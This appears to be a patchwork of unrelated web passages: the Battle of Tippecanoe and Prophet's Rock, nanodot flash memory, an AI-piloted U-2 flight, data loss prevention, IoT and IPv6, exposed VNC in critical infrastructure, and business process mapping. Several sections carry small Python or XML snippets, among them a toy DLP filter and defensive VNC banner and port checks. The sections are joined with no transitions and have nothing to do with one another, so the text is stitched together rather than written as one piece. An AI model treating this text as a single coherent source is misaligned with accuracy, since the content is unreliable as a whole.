The tensions led to the Battle of Tippecanoe on November 7, 1811, a genocidal affair in which Harrison achieved his goal of utterly destroying Prophetstown.
Prophet's Rock is an outcropping where Tenskwatawa, The Prophet, exhorted the community's inhabitants to resist the European forces.
Harrison had sent a series of letters to Tenskwatawa with a number of demands.
Tecumseh was away from Prophetstown recruiting followers from the Muscogee and Choctaw tribes.
Harrison moved his forces north from the southern Indiana territory, camping near Prophetstown on November 6. In a council that night, Tenskwatawa agreed on a pre-emptive strike. He said that he would cast spells to protect his warriors and confuse Harrison's.
Tenskwatawa's warriors surrounded Harrison's camp, and the gunfire started about 4:30 AM. The element of surprise was lost, and the native warriors attacked in a disorganized fashion.
The next day, Harrison sent a group to inspect Prophetstown. They found that it was deserted except for one elderly woman who had been too sick to flee. Harrison issued orders to burn the town, including food stores of 5,000 bushels of corn and beans, and to dig up the town's cemetery and scatter the buried bodies.
The first of the series of severe New Madrid earthquakes struck on December 16. Many tribes interpreted them as a sign of Tenskwatawa's power, as "a call to action". Attacks against European settlers and outposts in the Indiana and Illinois territories increased significantly.
Tecumseh remained a significant military figure on the frontier through the War of 1812 when his confederacy was allied with the British. He was killed the following year in a battle.
Prophet's Rock isn't a single rock or a formation of several large rocks. It's an outcropping mostly consisting of a conglomerate of small to medium pebbles. I'm sure it has changed significantly since Tenskwatawa's time.
Sure enough, here's what it looked like in 1902. This photograph is in the U.S. Library of Congress collection. The trees have grown over and around Prophet's Rock.
Harrison ran for U.S. President in 1840, winning the election along with his Vice-President John Tyler. His campaign used the slogan "Tippecanoe and Tyler, too".
Harrison only lived for 31 days in office, the shortest U.S. Presidential term so far. His inauguration was on a cold and windy day, and he stood out in the weather to deliver the longest inaugural address to date, some 8,445 words long. He later developed a cold, which worsened into pneumonia, and then he died.
A new type of memory is being trialled by researchers at the Taiwan National Nano Device Laboratories and University of California, Berkeley, that is able to write and erase data at 100 times the rate of current generation flash memory.
Described as "ultrafast metal-gate silicon quantum-dot (Si-QD) non-volatile memory (NVM)," it's made up of a layer of silicon nanodots 3nm in diameter. When combined with a metallic control layer it is, essentially, a storage medium. A precise laser is used to add or remove charge from the dots, making each of them the equivalent of a single bit.
Portable storage and solid state drives have seen big jumps in speed and capacity in recent years thanks to advances in flash. Suddenly making a jump to 100 times the current rate would certainly cause bottlenecks somewhere along the line.
One of the researchers from the Taiwanese research centre has been speaking about the development: "Our system uses numerous, discrete silicon nanodots for charge storage and removal. These charges can enter (data write) and leave (data erase) the numerous discrete nanodots in a quick and simple way. The materials and the processes used for the devices are also compatible with current main-stream integrated circuit technologies."
The fact that contemporary computing could make use of the nanodots as it currently is, is quite an exciting idea.
Source: Hexus
The AI algorithm, called ARTUu, was in charge of tactical navigation and sensor employment during a simulated missile strike as part of a reconnaissance mission. The algorithm used the aircraft’s radar in detecting enemy launchers, while the pilot was responsible for finding hostile aircraft.
The pilot transitioned the sensor control to the AI algorithm after liftoff. During the flight, the algorithm operated the sensor using learned insights from more than 500,000 computer simulated training iterations.
“ARTUu’s groundbreaking flight culminates our three-year journey to becoming a digital force,” said Will Roper, assistant secretary of the Air Force for acquisition, technology and logistics and a three-time Wash100 Award recipient, “Putting AI safely in command of a U.S. military system for the first time ushers in a new age of human-machine teaming and algorithmic competition. Failing to realize AI’s full potential will mean ceding decision advantage to our adversaries.”
Researchers at Air Combat Command's U-2 Federal Laboratory developed and trained the AI algorithm to carry out in-flight tasks.
Data Loss Prevention is a set of procedures and mechanisms to stop sensitive data from leaving a security boundary. This helps you hold onto your important data and information so you do not lose it or have it end up in the wrong hands.
Data Loss Prevention is often performed on email services because this is one of the most prevalent and likely sources of data exfiltration in businesses today.
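As a rough illustration of how an email DLP filter decides whether data may leave the security boundary, here is a toy Python sketch; the patterns are deliberately naive and not production-grade:

```python
import re

PATTERNS = {
    "ssn":         re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def dlp_violations(message_body: str) -> list:
    """Return the names of sensitive-data patterns found in an outbound message."""
    return [name for name, rx in PATTERNS.items() if rx.search(message_body)]

hits = dlp_violations("Per your request, the SSN is 123-45-6789.")
if hits:
    print("Blocked at the security boundary:", hits)   # ['ssn']
```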
What Does This Mean For An SMB?
Your business needs to take proactive measures today, first to reduce its chances of being hit by ransomware, phishing, or other cybersecurity attacks, and second to validate that backups and disaster recovery plans are current and functioning in case you are hit with ransomware. CyberHoot recommends the following best practices to avoid, prepare for, and prevent damage from these attacks:
- Adopt two-factor authentication on all critical Internet-accessible services
- Adopt a password manager for better personal/work password hygiene
- Require 14+ character Passwords in your Governance Policies
- Follow a 3-2-1 backup method for all critical and sensitive data
- Train employees to spot and avoid email-based phishing attacks
- Check that employees can spot and avoid phishing emails by testing them
- Document and test Business Continuity Disaster Recovery (BCDR) plans
- Perform a risk assessment every two to three years
Start building your robust, defense-in-depth cybersecurity plan at CyberHoot.
Source: Liu, S., & Kuhn, R. (2010, March/April). Data loss prevention. IEEE IT Professional, 11(2), pp. 10-13.
IoT - Bridging the Gap between Virtual and Physical World
The Internet of Things represents a vision in which the Internet extends into the real world embracing everyday objects. Physical items are no longer disconnected from the virtual world, but can be controlled remotely and can act as physical access points to Internet services. An Internet of Things makes computing truly ubiquitous. This development is opening up huge opportunities for both the economy and individuals.
The Internet of Things vision is grounded in the belief that the steady advances in microelectronics, communications and information technology we have witnessed in recent years will continue into the foreseeable future. In fact, due to their diminishing size, constantly falling price and declining energy consumption, processors, communications modules and other electronic components are being increasingly integrated into everyday objects today.
IoT has evolved from the convergence of wireless technologies, micro-electromechanical systems (MEMS), micro-services and the Internet. The convergence has helped tear down the silo walls between operational technology (OT) and information technology (IT), allowing unstructured machine-generated data to be analyzed for insights that will drive improvements. "Smart" objects play a key role in the Internet of Things vision, since embedded communication and information technology have the potential to revolutionize the utility of these objects. Using sensors, they are able to perceive their context, and via built-in networking capabilities they are able to communicate with each other, access Internet services and interact with people. "Digitally upgrading" conventional objects in this way enhances their physical function by adding the capabilities of digital objects, thus generating substantial added value. Forerunners of this development are already apparent today – more and more devices such as sewing machines, exercise bikes, electric toothbrushes, washing machines, electricity meters and photocopiers are being "computerized" and equipped with network interfaces.
In other application domains, Internet connectivity of everyday objects can be used to remotely determine their state so that information systems can collect up-to-date information on physical objects and processes. This enables many aspects of the real world to be “observed” at a previously unattained level of detail and at negligible cost. This would not only allow for a better understanding of the underlying processes, but also for more efficient control and management. The ability to react to events in the physical world in an automatic, rapid and informed manner not only opens up new opportunities for dealing with complex or critical situations, but also enables a wide variety of business processes to be optimized. The real-time interpretation of data from the physical world will most likely lead to the introduction of various novel business services and may deliver substantial economic and social benefits.
The Internet of Things is not the result of a single novel technology; instead, several complementary technical developments provide capabilities that taken together help to bridge the gap between the virtual and physical world. These capabilities include:
- Communication and cooperation
- Embedded information processing
- User interfaces
While the possible applications and scenarios outlined above may be very interesting, the demands placed on the underlying technology are substantial. Progressing from the Internet of computers to the remote and somewhat fuzzy goal of an Internet of Things is something that must therefore be done one step at a time. In addition to the expectation that the technology must be available at a low cost if a large number of objects are actually to be equipped, we are also faced with many other challenges, such as:
- Arrive and operate
- Software complexity
- Data volumes
- Data interpretation
- Security and personal privacy
- Fault tolerance
- Power supply
- Interaction and short-range communications
- Wireless communications
It is estimated that more than 50 billion devices will be wirelessly connected to the Internet of Things by 2020. Integration with the Internet implies that devices will use an IP address as a unique identifier. However, due to the limited address space of IPv4 (which allows for 4.3 billion unique addresses), objects in the IoT will have to use IPv6 to accommodate the extremely large address space required. Objects in the IoT will not only be devices with sensory capabilities, but will also provide actuation capabilities. To a large extent, the future of the Internet of Things will not be possible without the support of IPv6; consequently, the global adoption of IPv6 in the coming years will be critical for the successful development of the IoT. However, it also involves risks and undoubtedly represents an immense technical and social challenge.
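The address-space arithmetic behind that point is easy to verify; here is a short Python sketch:

```python
ipv4_addresses = 2 ** 32    # about 4.3 billion
ipv6_addresses = 2 ** 128   # about 3.4 x 10**38

print(f"IPv4: {ipv4_addresses:,}")        # 4,294,967,296
print(f"IPv6: {ipv6_addresses:.3e}")      # 3.403e+38
print(ipv6_addresses // 50_000_000_000)   # addresses per device even at 50 billion devices
```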
Research from cybersecurity and threat intelligence company Cyble identifies a spike in attacks targeting virtual network computing (VNC) — a graphical desktop-sharing system that uses the Remote Frame Buffer (RFB) protocol to control another machine remotely— in critical infrastructure sectors.
Analyzing their Global Sensor Intelligence (CGSI) data, researchers observed a spike in attacks on port 5900 (the default port for VNC) between July 9 and August 9. Most of the attacks originated in the Netherlands, Russia and Ukraine, according to the company, and highlight the risks of exposed VNC in critical infrastructure.
Exposed VNCs Put Industrial Control Systems at Risk
According to a blog post, organizations that expose VNC over the Internet without enabling authentication extend the reach of attackers and increase the probability of cyber incidents. More than 8,000 exposed VNC instances were detected with authentication disabled. The researchers also discovered that exposed assets connected via VNC are frequently bought, sold, and distributed in cybercrime forums and marketplaces.
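Defenders can verify their own exposure with a simple banner check. The sketch below (in Python, with a placeholder target address) relies on the RFB protocol's behavior of sending a 12-byte ProtocolVersion banner, such as b'RFB 003.008\n', as soon as a TCP connection opens on port 5900:

```python
import socket

def vnc_banner(host, port=5900, timeout=3.0):
    """Return the RFB ProtocolVersion banner if a VNC server answers, else None."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(12)            # ProtocolVersion message is exactly 12 bytes
    except OSError:
        return None

print(vnc_banner("192.0.2.10"))          # e.g. b'RFB 003.008\n' if VNC is exposed
```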
"Although the count of exposed VNCs is low compared to previous years, it should be noted that those found during the time of analysis belong to various organizations that fall within critical infrastructure, such as water treatment plants, manufacturing plants, and research facilities," according to the firm. Researchers also succeeded in identifying several human-machine interface (HMI) systems, supervisory control and data acquisition (SCADA) systems, and workstations connected via VNC and exposed on the Internet.
An attacker who gains access to such a dashboard can tamper with the operator’s settings, changing values for temperature, flow, pressure, and so on, which could increase stress on equipment and cause physical damage to the site, potentially harming nearby operators. An exposed SCADA system could likewise be operated by an attacker, who could also obtain confidential and sensitive information useful for compromising the entire ICS environment. Exposing systems in this way lets attackers target a particular component within the environment and set off a chain of events by manipulating the various processes involved in the targeted installation.
Vulnerable VNC Is an Easy Target for Attackers
VNC provides access to a targeted machine but offers woefully insufficient protection for it, even when passwords are used. The damage that can be caused depends on the organization and on the user permissions under which VNC is running. In one example, a Ministry of Health system was found exposed, putting private health information at risk.
Remote desktop services such as VNC are among the easiest targets for attackers to identify: they run on well-known default ports, and many tools exist to search for these services and brute-force their passwords. Any organization running public-facing remote-access services without authentication configured is essentially putting out a ‘welcome’ sign for adversaries. Finding these open services is trivial, so any actor, from script kiddies to the most sophisticated groups, could take advantage of such misconfigurations to gain initial access to an environment. One challenge of protecting critical infrastructure environments is that many defenders assume an air gap separates traditional IT networks from ICS networks. Segmented networks do not always exist, and those responsible for defense need real-time visibility into public-facing services. These services should have restricted network access and strong authentication enabled, including certificate-based authentication.
Businesses should limit the exposure of VNC to the Internet and use multi-factor authentication (MFA) for any remote connectivity to a network, whether through a VPN or directly via protocols such as RDP, VNC, or SSH.
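As a first step toward that advice, an administrator can audit their own hosts for listening VNC ports. The sketch below uses only the Python standard library; the host list is a placeholder, and it should only ever be pointed at systems you are authorized to test.

```python
import socket

# Placeholder inventory: replace with hosts you own / are authorized to audit.
HOSTS = ["192.0.2.10", "192.0.2.11"]
# VNC listens on 5900 by default; additional displays use 5901, 5902, ...
VNC_PORTS = range(5900, 5906)

def is_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for host in HOSTS:
    for port in VNC_PORTS:
        if is_open(host, port):
            print(f"WARNING: {host}:{port} is reachable -- verify that "
                  f"authentication is enabled or close the port.")
```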
Business process mapping is an excellent way to optimize business process efficiency, improve business outcomes, and strengthen financial performance.
When used properly, business process mapping can generate significant advantages, both for the organization itself and for other stakeholders, including employees, customers, and business partners.
Well-defined business processes are, after all, more efficient, visible, compliant, adjustable, and performant. All of these advantages, in turn, make the organization’s operations more effective and profitable.
To take full advantage of business process mapping, though, it is important to understand what process mapping is, how it works, and the differences between types of process maps.
4 Types of Business Process Mapping
Below we’ll look at several types of process mapping techniques, their differences, and their advantages.
Different process maps will identify different elements in a process, such as roles, responsibilities, goals, and resources. Here are a few examples.
1. Flowcharts
Flowcharts are the most basic type of process map. They consist of a series of shapes, connected by arrows and lines.
Processes can be linear, though they often branch at decision points. Flowcharts are designed to map out specific elements of a process, such as tasks, activities, and decisions.
Since flowcharts are so easy to understand, they are among the most widely used business process mapping techniques.
While flowcharts are useful for developing a clear understanding of a business process, they do not address other elements such as roles and responsibilities. For this, it is best to use different types of process mapping tools, such as those covered below.
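To make this concrete, a simple flowchart can even be generated programmatically. The sketch below uses the third-party `graphviz` Python package (an assumption: it must be installed, along with the Graphviz system binaries), and the order-handling process it draws is invented purely for illustration.

```python
from graphviz import Digraph  # pip install graphviz; requires Graphviz binaries

# Hypothetical order-handling process, for illustration only.
flow = Digraph("order_process")
flow.node("start", "Order received", shape="oval")
flow.node("check", "Stock available?", shape="diamond")  # decision point
flow.node("ship", "Ship order", shape="box")
flow.node("backorder", "Create backorder", shape="box")
flow.node("end", "Order closed", shape="oval")

flow.edge("start", "check")
flow.edge("check", "ship", label="yes")
flow.edge("check", "backorder", label="no")
flow.edge("ship", "end")
flow.edge("backorder", "end")

flow.render("order_process", format="png", cleanup=True)  # writes order_process.png
```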
2. Swim Lanes
Swim lane diagrams are another type of process map. They look much like flowcharts, except that they are divided into columns, each assigned to a job function or role.
As in a flowchart, the workflow is broken down into tasks, activities, and decision points.
Yet since swim lanes also assign those tasks to job roles, they can help managers and employees know who is responsible for each task in the workflow.
3. Business Process Model and Notation (BPMN)
An approach that goes into further detail is Business Process Model and Notation, or BPMN.
BPMN is a standardized notation that establishes a common visual language for process diagrams such as flowcharts.
Because it is a shared language, diagrams written in BPMN can be understood across teams and tools and used to standardize business processes more effectively.
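Under the hood, BPMN 2.0 diagrams are backed by an XML interchange format, which is what lets a process drawn in one tool be opened in another. The fragment below is a minimal hand-written sketch of a one-task process; the IDs and names are invented for illustration.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
             id="defs_1" targetNamespace="http://example.com/bpmn">
  <process id="approve_invoice" isExecutable="false">
    <startEvent id="start" name="Invoice received"/>
    <userTask id="review" name="Review invoice"/>
    <endEvent id="end" name="Invoice approved"/>
    <sequenceFlow id="f1" sourceRef="start" targetRef="review"/>
    <sequenceFlow id="f2" sourceRef="review" targetRef="end"/>
  </process>
</definitions>
```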
4. Value Stream Mapping
Value stream mapping is an example of a business process map that goes into far more detail than those covered above.
These diagrams focus on the value chain, or the process of transforming raw materials into an end product or service.
A value stream map displays more detail about each step in a process, such as the time and the resources needed for each task.
The purpose is to assess the costs, time, resources, and efficiency of an end-to-end workflow, which can help managers better calculate the overall costs of a process.
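Because value stream maps attach numbers to each step, parts of the analysis can be automated. The sketch below, using entirely made-up process data, computes two standard value-stream metrics: total lead time and the fraction of it that is value-adding.

```python
# Hypothetical value stream data: (step name, processing minutes, waiting minutes)
steps = [
    ("Receive raw material", 10, 240),
    ("Machine part",         45,  60),
    ("Inspect",              15, 120),
    ("Package and ship",     20,  30),
]

process_time = sum(p for _, p, _ in steps)  # value-adding time
wait_time = sum(w for _, _, w in steps)     # non-value-adding time
lead_time = process_time + wait_time        # end-to-end duration

print(f"Total lead time:          {lead_time} min")
print(f"Value-adding time:        {process_time} min")
print(f"Process cycle efficiency: {process_time / lead_time:.1%}")
```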
Process mapping helps leaders solve problems, manage risks, increase efficiency, and improve performance across the organization.
As we have seen, however, not all process maps serve the same purpose: each type has a different focus and a different set of benefits.
Business process mapping, it should be noted, goes hand-in-hand with other disciplines and methodologies aimed at enhancing process efficiency and outcomes.
Beyond Business Process Mapping
Let’s look at a few other tools and frameworks that can be used to improve business process performance and outcomes.
- Process mining is a technique that uses software to extract event data from the systems that run business processes. This can be useful for optimizing digital workflows, identifying deficiencies, and improving employee productivity. Like business process mapping, process mining can help managers diagram and understand a process. Unlike business process mapping, however, process mining aims to identify what a process looks like in the real world, as opposed to what it should look like (a minimal sketch of this idea follows this list).
- Process improvement methodologies are business frameworks designed to, unsurprisingly, improve business processes. These are management tools or models that identify best practices for driving quality improvement within processes. Lean is one example. This process improvement methodology aims at reducing waste within processes. That waste reduction in turn can improve efficiency, enhance quality, and improve process outcomes.
- Business process management software is an essential tool for designing, optimizing, and redesigning business processes. The exact features vary by application but can include the ability to create flowcharts and business process maps, the ability to mine data from processes, task automation, workflow analytics, business process modeling, and more. These tools are becoming ever more essential in today’s digital workplace, which involves the use of multiple software applications in a distributed work environment.
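As promised above, here is a minimal, illustrative process-mining sketch. Real tools work on event logs exported from business systems; the log below is fabricated, and the analysis shown (counting which activity directly follows which) is only the simplest building block of process-discovery algorithms.

```python
from collections import Counter

# Fabricated event log: (case id, activity), already ordered by timestamp per case.
event_log = [
    ("c1", "Create order"), ("c1", "Check credit"), ("c1", "Ship"),
    ("c2", "Create order"), ("c2", "Check credit"), ("c2", "Reject"),
    ("c3", "Create order"), ("c3", "Ship"),  # skipped credit check: a deviation
]

# Group activities per case, preserving order.
traces: dict[str, list[str]] = {}
for case, activity in event_log:
    traces.setdefault(case, []).append(activity)

# Count directly-follows relations across all cases.
follows = Counter()
for trace in traces.values():
    for a, b in zip(trace, trace[1:]):
        follows[(a, b)] += 1

for (a, b), n in follows.most_common():
    print(f"{a} -> {b}: {n} time(s)")
# The rare "Create order -> Ship" edge reveals how the process actually ran,
# which is exactly the real-world view process mining provides.
```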
These are just three examples of tools that can be used in conjunction with business process mapping; in some cases they include business process maps or offer features that complement and enhance process mapping. For more information, see our articles on some of the topics covered in this post, such as process mapping and BPMS.